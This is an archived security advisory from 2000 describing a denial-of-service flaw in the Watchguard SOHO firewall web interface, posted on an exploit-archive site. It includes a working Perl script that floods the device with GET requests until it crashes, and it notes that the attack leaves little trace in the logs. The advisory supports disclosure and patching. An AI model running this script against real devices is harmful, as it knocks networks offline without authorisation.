what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

scx-sa-10.txt

scx-sa-10.txt
Posted Dec 8, 2000
Authored by Vorlon | Site securax.org

Securax Security Advisory #10 - The Watchguard SOHO Firewall is a small personal hardware firewall used for xDSL, ISDN and Cable connections. Local and Remote users can crash the Watchguard SOHO Firewall using multiple get requests to the webserver. Perl exploit included. This attack will not show up in the logfile except for a reboot notice.

tags | exploit, remote, local, perl
SHA-256 | 8cbd330a7967aec426b0384fc3164e9e13b747e02aa4999c841e1b6a29574a7a

scx-sa-10.txt

Change Mirror Download
=====================================================================
Securax-SA-10 Security Advisory
belgian.networking.security Dutch
=====================================================================
Topic: Watchguard SOHO 2.2 Denial of Service
Announced: 2000-12-04
Affects: Watchguard SOHO Firmware 2.2.1 and below
Not affected: Watchguard SOHO Firmware > 2.2.1
Vendor Status: Contacted & Comfirmed
=====================================================================
http://www.securax.org/pers



THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR
RESULTS. THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS
100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR
NOTICE.

PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING
THE BUG DISCUSSED IN THIS ADVISORY, PLEASE SHARE THIS ON BUQTRAQ
OR VULN-DEV. THANK YOU,




I. Background

The Watchguard SOHO Firewall is a small personal hardware firewall
used for xDSL, ISDN and Cable connections. The Firewall uses a
packet filtering based approach including Dynamic NAT'ting. There
is option for one machine in a DMZ and has support for VPN. The
SOHO model is intended for small office and home office users. To
configure the firewall there is a html interface accessible to the
local side ( default ) and even remote side ( through password ).



II. Problem Description

Local and Remote users can crash the Watchguard SOHO Firewall using
alot (+ 70) of GET requests to the webserver on the machine. While
sending these request we can see the free memory getting down very
fast. (from 700k to 500k after just a few requests).



III. Reproduction of the problem


#!/usr/bin/perl
#
# You can also connect to the Watchguard SOHO through your
# browser and press F5 like a maniac on speed to get the
# firewall crashing. So, either you run the .pl script or
# you fire up your webbrowser... Either way, it works.
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
# (c)Proof of concept, vorlon <filip@securax.be>
# ----------------------------------------------------------
use IO::Socket;

$host = "your_watchguard_ip";
$port = "your_port";
$repeat = "100";
$request = "GET / HTTP/1.0";

print "Watchguard SOHO Denial of Service, connecting to $host:$port...\n";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Failed.\n";

$counter = 0;
print "Repeating request for $repeat times.\n";
while($counter < $repeat) {
print $socket "$request\n";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "\nThe Watchguard SOHO has crashed. BEEFCAKE!...\n";
print ".";
$counter += 1;
}
print "\nDone.\n\n";

close($socket);



III. Impact

After using this exploit, the Firewall has been rendered useless and
will reboot or simply crash and burn ( in this case, you'll have to pull
the plug to reset the machine ). In case of a spontanious reboot, the
downtime of the firewall, thus functionality of the company, is
considered to be between one minute and five minutes. If one is
constantly running exploit-code, the firewall can be kept under a
constant outage. This attack will not show up in the logfile except
for a reboot notice.



IV. Solution

Upgrade to a more recent Firmware ( > 2.2.1 ). Check the website
for more information < http://bisd.watchguard.com >. IMHO, a nice
bughunt in their webservice should be nice ;-)



V. Credits

Cicer0 < davy@securax.be > for original error discovery -*- vorlon
< filip@securax.be > for advisory, exploit code and additional
testing.





=====================================================================
For more information info@securax.org
Website http://www.securax.org
http://www.securax.be
Advisories/Text http://www.securax.org/pers
---------------------------------------------------------------------
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close